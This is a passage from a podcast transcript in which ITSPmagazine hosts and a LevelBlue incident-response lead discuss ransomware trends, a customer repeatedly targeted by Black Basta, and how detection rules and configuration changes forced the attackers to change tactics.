And I think the problem with that line of thinking is that once you've been compromised, threat actors now have all this information. They have how your usernames are. Like they have all the IP addresses of your VPN, your internal, you know, domain. They have hashes, they have usernames, they have file structures. 
 

They now can tell other threat actors, Hey, I easily got into these guys. Um, they might make changes, but I bet you these usernames still exists or they still allow, you know, this kind of policy. 
 

[00:24:53] Sean Martin: Oh, they, they'd never share that information. Come on. 
 

[00:24:57] Marco Ciappelli: So this level of [00:25:00] complexity, like, I mean what you're describing it, it really requires some serious size teams too. To think all this over. And of course, that's the role of the vendors, that the role of, you know, the cybersecurity professionals and, and the tools that are used to make things a little bit more approachable. 
 

So can you show us, like, give us some good news of maybe case studies where successfully this could have been mitigated. 
 

[00:25:35] Kenneth Ng: Yeah, I think we've, we've worked with a number of customers that get compromised, right? Our, our team provides, my team, we provide 10 hours of IR to each of our MDR customers. Um, and that gives us a lot of time to provide guidance and recommendations. And I think a really good example is a customer we had that are repeatedly targeted by the same threat actor, [00:26:00] uh, in this case, Black Basta, a known ransomware gang in this case. 
 

They've been a little inactive last couple of weeks, almost month now. But some of the. TIPS we've provided to them have actually made the threat actor pivot multiple times. Uh, one of the first examples when we saw, first saw 'em get compromised through the Microsoft Teams rec, um, fake IT support attack, we told 'em, Hey, you need to do a white listing approach and you need to remove quick assist. 
 

So they took that action and the threat actor realized they were no longer able to come in that way and started doing phone calls. Um, so that that's showing that we're working around the threat actor. We're making changes that makes the threat actor's lives more difficult. Um, in this case, that first incident also taught us, uh, some of the actions a threat actor was doing to do DLL side loading to execute their malware. 
 

Uh, in this case, from seeing that [00:27:00] incident, we were able to create custom rules within the EDR. Bam, the next incident, we saw that. So the threat actor, yes, they were able to call up a user, get the user to download a separate tool, but now we saw the alarms trigger for a downstream activity. So I think it's not specific to level blue like the Ven, the cyber vendors in general are getting better because we're seeing such an uptick in activity. 
 

I think the problem is there's still so much to be done. On the customer side, but in terms of like detections and the things that we can do as a vendor, we're, we're definitely trying to be one step ahead. I dunno if that quite answers your question, Marco. It's, it's a bit of good news for us that we can, you know, see 
 

[00:27:46] Marco Ciappelli: No, no, it, it does, 
 

[00:27:48] Kenneth Ng: but it, there's still a lot to be done. 
 

[00:27:50] Marco Ciappelli: Yeah. Like just the idea to know that there are the tools available and, and, and you know, then, then it's a matter of get this tool and. [00:28:00] Execute what you've been told to do as even as a consulting level. Um, and that's a good example of, Hey, do this and do that. And all of a sudden you're mitigating somehow the 
 

[00:28:11] Sean Martin: Yeah. Well, I think, I think this is an important part of the conversation is that most organizations can't scale that task or that activity or whatever on their own. And they need help from, from the likes of LevelBlue that have a lab team and a SOC team and a detection team and, and research teams that kinda analyze all this stuff to, to map out all these different paths, right? And there, there's gonna be some com commonality across the, the paths, there are gonna be some unique paths taken, unique tools used and things like that. But for, for your team, Ken, to, to come together and, and provide this information to organizations, I think is super helpful. 
 

'cause that, that does scale right? Do it, do it once and help many [00:29:00] is an important piece. 
 

[00:29:02] Kenneth Ng: Yep. And we're trying to, and that, that's why, you know, we have the report, we have LevelBlue blog posts. Uh, we, we talk about what we're seeing and how to take the steps. Um, we also have a customer engagement team. So for our MDR customers, as we have these findings, it's communicated to all the customers. 
 

So just because we helped one customer in this incident doesn't mean there aren't lessons learned that could be implemented for customers across our fleet. And for those who come, come to our website and read our blogs and. We're, we're trying to make the cyberspace a better and safer spot, and that's what LevelBlue is trying to, trying to do. 
 

[00:29:39] Sean Martin: Absolutely. What, um, clearly you didn't stop, uh, collecting and monitoring, and, and Marco alluded to, you're, you're working on a new one, uh, for 2025. Um, obviously not a complete set for 2025 yet, but initial, initial view of what you're seeing is still in [00:30:00] line with 2024, or any, any big things stand out to you? 
 

[00:30:06] Kenneth Ng: Yeah, I would say it basically aligns, we're still seeing phishing. Uh, we had, I think, seven business email compromise attacks, uh, this past week. We had four malware attacks and two ransomware attacks, so the data aligns. I think we wanna be more forward thinking with the 2025, uh, H1, uh, report. We wanna make sure we hit on some of the future trends that we, I 
 

might see, uh, I think there's definitely gonna be a deeper discussion on some of the malware we're seeing and how to protect against those. Uh, our labs team is working hard to track the threat actor infrastructure for the phishing kits on the, on the malware we're seeing, and I, I, I see it being more the same, but we, this being a second iteration, we now have a better idea of how to frame, kind of, the ideas and the data we're seeing, how to better [00:31:00] convey it and more importantly, make the right recommendations for customers. Regardless of the breadth and size of their teams, there's gonna be recommendations that, you know, even, uh, mom and pop with one IT guy can make to, to better secure their environment. 
 

[00:31:14] Marco Ciappelli: Yep. 'cause you guys have the trend report, but also you have the futures report and that's gonna come up soon, right? April 28. 
 

[00:31:23] Kenneth Ng: 28th at RSA. 
 

[00:31:25] Marco Ciappelli: Yeah. 
 

[00:31:25] Kenneth Ng: Very exciting time, please. Uh, definitely it's gonna be on levelblue.com. And speaking of RSA, actually our labs team is actually gonna have a very exciting presentation on the usage of residential proxies by threat actors. So look, look forward to seeing that. 
 

[00:31:41] Sean Martin: That sounds fun if you're a nerd like me and or, or, or a defender practitioner. Um, well, Ken, it's been, it's been great chatting with you. Is there anything else that we wanna highlight? I guess the thing that always [00:32:00] strikes me is ransomware is still a thing. I don't know. It's been, I don't know how many years now we've been battling this. 
 

Do, do you see that we're able, are we able to get ahead of it at some point? What do you think? 
 

[00:32:15] Kenneth Ng: Uh, I think speaking as a practitioner, as long as there's gonna be vulnerabilities and as long as there's gonna be money to be made through the ransomware attacks, uh, until we have quantum computers breaking encryption, uh, there's always gonna be ransomware, there's always gonna be threat actors. Uh, it's just about how well you can defend, detect, and prevent. 
 

So, 
 

[00:32:38] Marco Ciappelli: And you know what? There are also always gonna be humans and social engineering. And, 
 

[00:32:44] Sean Martin: hope 
 

[00:32:45] Marco Ciappelli: I mean, we, we changed the, 
 

[00:32:46] Sean Martin: but the humans. Anyway. 
 

[00:32:47] Marco Ciappelli: Yeah, well we changed the name. We bring it to the digital world. But these are things that, you know, ransom, that existed before. We call it ransomware, you know, it's, it's, it's just, it's kind of, [00:33:00] I don't wanna be negative, but it is kind of what, part of how our society is made and it just replicated and amplified probably through the digital world and the fact that we're all connected and, and the level of complexity. 
 

And you can just go and knock door to door and, and trick someone. You just do it on a mass scale. And, uh, and I think, I mean, I, I would love to see one of your next reports say, Hey, it got, uh, it's not trending up anymore, but I don't know, man. 
 

[00:33:30] Kenneth Ng: I, I am not sure we'll, I'll ever end up writing that as a sentence, but, uh, do look forward to our next trend report. We're aiming for August timeframe. We're trying to do these bi-yearly, but Marco, you'll be the first person I reach out to if, hey, ransomware's down 50%, 
 

[00:33:45] Marco Ciappelli: me know, let me know. But, but you know what the other thing is, as this is trending up, um, and is not probably gonna end, it's also true that companies like LevelBlue are always gonna be fighting the good fight [00:34:00] and they're always gonna do the best and do research and look at the past, the present and the future and, and try to mitigate all of this. 
 

And that's, that's, honestly, if that's all we can do, I think it's, it's pretty damn good. 
 

[00:34:13] Sean Martin: Yeah. Well it's, it's super important. Marco, you and I share, I don't know if you saw, but we, we share a friend that, that wasn't directly impacted, but uh, dialysis machines. Dialysis machines were compromised for ransomware. 
 

[00:34:26] Marco Ciappelli: Yep. 
 

[00:34:27] Sean Martin: Um, that is pretty close to home, to, uh, physical life. Right. So, and, and, and, and a friend as well. 
 

So, uh, this is important stuff and I'm thrilled that Ken and you and the team are, are working hard at finding a way to, uh, to mitigate this stuff, even if we can't prevent it from happening. Uh, there'll always be, always be those people out there, but if we can arm the organizations with information and knowledge and tools and, and, uh, a bit of support from your team as well. 
 

I think we're in, we're in better shape, [00:35:00] so 
 

[00:35:00] Marco Ciappelli: Yeah, so little memo here, uh, in the notes there will be a link to get to the, the report, uh, that we just discussed. And then of course, stay tuned for the futures report to be released, uh, on April 28th. And, uh, and also stay tuned for the next trend report, which will be released around, we don't know yet exactly the date, but around August time, you know, 'cause you know everything but, well, Ken, that was great. 
 

I've really enjoyed it. 
 

[00:35:31] Sean Martin: Fantastic chat. Yep. Appreciate it and everybody listening and watching. Uh, thanks for joining us for this, uh, brand story here on ITSPmagazine with the Level team, Blue, LevelBlue team, I should say. Uh, of course, please do subscribe and share with your friends and, uh, coworkers and colleagues and others in the industry. 
 

Uh, help us all get ahead of this, uh, trend that's not, uh, not stopping, it seems. So, thanks everybody. We'll [00:36:00] talk to you soon. 
 

[00:36:01] Marco Ciappelli: Thank you, Ken.